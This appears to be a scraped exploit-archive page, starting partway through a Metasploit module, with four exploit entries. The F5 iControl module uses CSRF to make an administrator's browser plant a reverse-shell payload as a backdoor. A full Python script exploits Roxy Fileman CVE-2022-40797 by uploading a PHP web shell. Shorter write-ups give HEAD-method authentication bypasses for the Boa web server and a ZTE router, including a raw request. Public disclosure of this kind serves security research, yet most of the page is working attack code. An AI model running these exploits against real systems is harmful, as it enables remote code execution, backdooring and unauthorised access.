'Type' => :unix_cmd,<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [ 'Restart', {}, ],<br /> [ 'Login', {}, ],<br /> [ 'Custom', {}, ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp'<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [<br /> IOC_IN_LOGS,<br /> ARTIFACTS_ON_DISK<br /> ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('TARGET_HOST', [true, 'The IP or domain name of the target F5 device']),<br /> OptString.new('TARGET_URI', [true, 'The URI of the SOAP API', '/iControl/iControlPortal.cgi']),<br /> OptBool.new('TARGET_SSL', [true, 'Use SSL for the upstream connection?', true]),<br /> OptString.new('FILENAME', [false, 'The file on the target to overwrite (for "custom" target) - note that SELinux prevents overwriting a great deal of useful files']),<br /> ]<br /> )<br /> end<br /><br /> def on_request_uri(socket, _request)<br /> if datastore['TARGET'] == 0 # restart<br /> filename = '/shared/f5_update_action'<br /> file_payload = <<~EOT<br /> UpdateAction<br /> https://localhost/success`#{payload.encoded}`<br /> https://localhost/error<br /> 0<br /> 0<br /> 0<br /> 0<br /> EOT<br /><br /> # Delete the logfile if we get a session<br /> register_file_for_cleanup('/var/log/f5_update_checker.out')<br /><br /> print_status("Redirecting the admin to overwrite #{filename}; if successful, your session will come approximately 2 minutes after the target is rebooted")<br /> elsif datastore['TARGET'] == 1 # login<br /> filename = '/var/run/config/timeout.sh'<br /> file_payload = "#{payload.encoded} & disown;"<br /><br /> # Delete the backdoored file if we get a session.. this will be fixed at<br /> # next reboot<br /> register_file_for_cleanup('/var/run/config/timeout.sh')<br /><br /> print_status("Redirecting the admin to overwrite #{filename}; if successful, your session will come the next time a user logs in interactively")<br /> else # Custom<br /><br /> filename = datastore['FILENAME']<br /> file_payload = payload.encoded<br /><br /> print_status("Redirecting the admin to overwrite #{filename} with the payload")<br /> end<br /><br /> # Build the SOAP request that'll be sent to the target server<br /> csrf_payload = %(<br /> <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:con="urn:iControl:System/ConfigSync"><br /> <soapenv:Header/><br /> <soapenv:Body><br /> <con:upload_file soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><br /> <file_name xsi:type="xsd:string">#{filename}</file_name><br /> <file_context xsi:type="urn:System.ConfigSync.FileTransferContext" xmlns:urn="urn:iControl"><br /> <!--type: Common.OctetSequence--><br /> <file_data xsi:type="urn:Common.OctetSequence">#{Rex::Text.encode_base64(file_payload)}</file_data><br /> <chain_type xsi:type="urn:Common.FileChainType">FILE_FIRST_AND_LAST</chain_type><br /> </file_context><br /> </con:upload_file><br /> </soapenv:Body><br /></soapenv:Envelope><br /> )<br /><br /> # Build the target URL<br /> target_url = "#{datastore['TARGET_SSL'] ? 'https' : 'http'}://#{datastore['TARGET_HOST']}#{datastore['TARGET_URI']}"<br /><br /> # Build the HTML payload that'll send the SOAP request via the user's browser<br /> html_payload = %(<br /><html><br /> <body><br /> <form action="#{target_url}" method="POST" enctype="text/plain"><br /> <textarea id="payload" name="<!--">-->#{Rex::Text.html_encode(csrf_payload)}</textarea><br /> </form><br /> <script><br /> document.forms[0].submit();<br /> </script><br /> </body><br /></html><br /> )<br /><br /> # Send the HTML to the browser<br /> send_response(socket, html_payload, { 'Content-Type' => 'text/html' })<br /> end<br /><br /> def exploit<br /> # Sanity check<br /> if datastore['TARGET'] == 2 && (!datastore['FILENAME'] || datastore['FILENAME'].empty?)<br /> fail_with(Failure::BadConfig, 'For custom targets, please provide the FILENAME')<br /> end<br /><br /> print_good('Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below')<br /> super<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Roxy Fileman <= 1.4.6 Arbitrary File Upload (Unathenticated)<br /># Date: 11/12/2022<br /># Exploit Author: Hadi Mene <hadi_mene@hotmail.com><br /># Vendor Homepage: roxyfileman.com<br /># Software Link: https://web.archive.org/web/20210126213412/https://roxyfileman.com/download.php?f=1.4.6-php<br /># Version: <= 1.4.6<br /># Tested on: Ubuntu 18.04 <br /># CVE : CVE-2022-40797<br /><br /># https://nvd.nist.gov/vuln/detail/CVE-2022-40797 <br /><br />import requests<br />from optparse import OptionParser<br />from os.path import basename<br /><br />banner = '#################################################\n'<br />banner += '# Roxy Fileman <= 1.4.6 Arbitrary File Upload #\n'<br />banner += '#\t\t\t\t\t\t#\n'<br />banner += '#\tCVE-2022-40797 exploit code\t\t#\n'<br />banner += '#\t\t\t\t\t\t#\n'<br />banner += '#\t\t\t\t\t\t#\n'<br />banner += '# Author : Hadi Mene <hadi_mene@hotmail.com>\t#\n'<br />banner += '#\t\t\t\t\t\t#\n'<br />banner += '#################################################\n'<br /><br /><br />parser = OptionParser()<br />parser.add_option("-u", "--url", dest="url",<br /> help="url of roxy fileman installation")<br />parser.add_option("-s", "--shell",dest="shell", default=False,<br /> help="path of the php shell if not specified defaut shell will be uploaded ")<br /><br /><br />(options, args) = parser.parse_args()<br /><br /><br />if options.url is None:<br /> parser.error('URL is required use -h for help')<br /><br />url = options.url<br /><br />#It seems that in some versions of the app an '/' in the end of the url breaks the exploit code<br />if (url.endswith('/')):<br /> url = url[:-1] # we delete that '/'<br /> <br />webroot = options.url.split('/')[3:]<br />webroot = '/'+ '/'.join(webroot)<br /><br />if (webroot.endswith('/')):<br /> webroot = webroot[:-1]<br /> <br />webroot = webroot+'/Uploads'<br /><br />if options.shell:<br /> shell = open(options.shell,'r').read()<br /> filename = basename(options.shell)<br /> filename = filename.split('.')[0]<br /> <br />else:<br /> # default shell<br /> shell = "<?php system($_GET['cmd']); ?>"<br /> filename = 'shell'<br /><br /><br />headers = {<br /> 'Host': (url.split('/')[2]),<br /> 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',<br /> 'Accept': '*/*',<br /> 'Accept-Language': 'en-US,en;q=0.5',<br /> 'Content-Type': 'multipart/form-data; boundary=---------------------------39556237418830295983527604767',<br /> 'Origin': (url.split('/')[2]),<br /> 'Connection': 'close',<br />}<br /><br />data = '-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="action"\r\n\r\nupload\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="method"\r\n\r\najax\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="d"\r\n\r\n'+(webroot)+'\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="files[]"; filename="'+(filename)+'.phar"\r\nContent-Type: text/plain\r\n\r\n'+shell+'\n\r\n-----------------------------39556237418830295983527604767--\r\n'<br /><br />#We check if a file with the same filename is already there <br />#because Roxy doesn't overwrite file instead it changes the filename of the newly uploaded file<br />if 'href="'+filename+'.phar"' in (requests.get(url+'/Uploads/').text):<br /> already_uploaded = True<br />else:<br /> already_uploaded = False<br /> <br /># file upload<br />req = requests.post(url+'/php/upload.php', headers=headers, data=data, verify=False)<br />response = (req.text)<br /><br />print(banner)<br /><br />if '{"res":"ok","msg":""}' in (response):<br /># success<br /> print('File Uploaded Successfully!!!')<br /> <br /> if already_uploaded:<br /> print('A file with the same filename is already on the server..')<br /> print('URL: '+url+'/Uploads/'+(filename)+' - Copy X.phar ')<br /> <br /> else:<br /> print('URL: '+url+'/Uploads/'+(filename)+'.phar')<br /><br />else:<br /> # failure<br /> print('Shell Upload Failed :((( ')<br /> print(response) #debug<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Boa Web Server 0.94.13-0.94.14 Authentication Bypass<br /># Date: 19-11-2022<br /># Exploit Author: George Tsimpidas <br /># Vendor: https://github.com/gpg/boa<br /># CVE: N/A <br /># Tested on: Debian 5.18.5<br /><br />Description :<br /><br />Boa Web Server Versions from 0.94.13 - 0.94.14 fail to validate the<br />correct security constraint on the HEAD http method allowing everyone<br />to bypass the Basic Authorization Mechanism.<br /><br />Culprit :<br /><br />if (!memcmp(req->logline, "GET ", 4))<br />req->method = M_GET;<br />else if (!memcmp(req->logline, "HEAD ", 5))<br />/* head is just get w/no body */<br />req->method = M_HEAD;<br />else if (!memcmp(req->logline, "POST ", 5))<br />req->method = M_POST;<br />else {<br />log_error_doc(req);<br />fprintf(stderr, "malformed request: \"%s\"\n", req->logline);<br />send_r_not_implemented(req);<br />return 0;<br />}<br /><br />The req->method = M_HEAD; is being parsed directly on the response.c<br />file, looking at how the method is being implemented for one of the<br />response codes :<br /><br />/* R_NOT_IMP: 505 */<br />void send_r_bad_version(request * req)<br />{<br /> SQUASH_KA(req);<br /> req->response_status = R_BAD_VERSION;<br /> if (!req->simple) {<br /> req_write(req, "HTTP/1.0 505 HTTP Version Not Supported\r\n");<br /> print_http_headers(req);<br /> req_write(req, "Content-Type: " HTML "\r\n\r\n"); /* terminate<br />header */<br /> }<br /> if (req->method != M_HEAD) {<br /> req_write(req,<br /> "<HTML><HEAD><TITLE>505 HTTP Version Not<br />Supported</TITLE></HEAD>\n"<br /> "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTP<br />versions "<br /> "other than 0.9 and 1.0 "<br /> "are not supported in Boa.\n<p><p>Version encountered: ");<br /> req_write(req, req->http_version);<br /> req_write(req, "<p><p></BODY></HTML>\n");<br /> }<br /> req_flush(req);<br />}<br /><br /><br />Above code condition indicates that if (req->method != M_HEAD) therefore<br />if the the requested method does not equal to M_HEAD then<br /><br />req_write(req,<br /> "<HTML><HEAD><TITLE>505 HTTP Version Not<br />Supported</TITLE></HEAD>\n"<br /> "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTP<br />versions "<br /> "other than 0.9 and 1.0 "<br /> "are not supported in Boa.\n<p><p>Version encountered: ");<br /> req_write(req, req->http_version);<br /> req_write(req, "<p><p></BODY></HTML>\n");<br /> }<br /><br />So if the method actually contains the http method of HEAD it's being<br />passed for every function that includes all the response code methods.<br /></code></pre>
<pre><code># Exploit Title: Router ZTE-H108NS - Authentication Bypass<br /># Date: 19-11-2022<br /># Exploit Author: George Tsimpidas <br /># Vendor: https://www.zte.com.cn/global/<br /># Firmware: H108NSV1.0.7u_ZRD_GR2_A68<br /># CVE: N/A # Tested on: Debian 5.18.5<br /><br />Description :<br /><br />When specific http methods are listed within a security constraint,<br />then only those<br />methods are protected. Router ZTE-H108NS defines the following http<br />methods: GET, POST, and HEAD. HEAD method seems to fall under a flawed<br />operation which allows the HEAD to be implemented correctly with every<br />Response Status Code.<br /><br /><br />Proof Of Concept :<br /><br />Below request bypasses successfully the Basic Authentication, and<br />grants access to the Administration Panel of the Router.<br /><br /><br />HEAD /cgi-bin/tools_admin.asp HTTP/1.1<br />Host: 192.168.1.1<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 1<br />Connection: close<br />Cookie: SESSIONID=1cd6bb77<br />Upgrade-Insecure-Requests: 1<br />Cache-Control: max-age=0<br /></code></pre>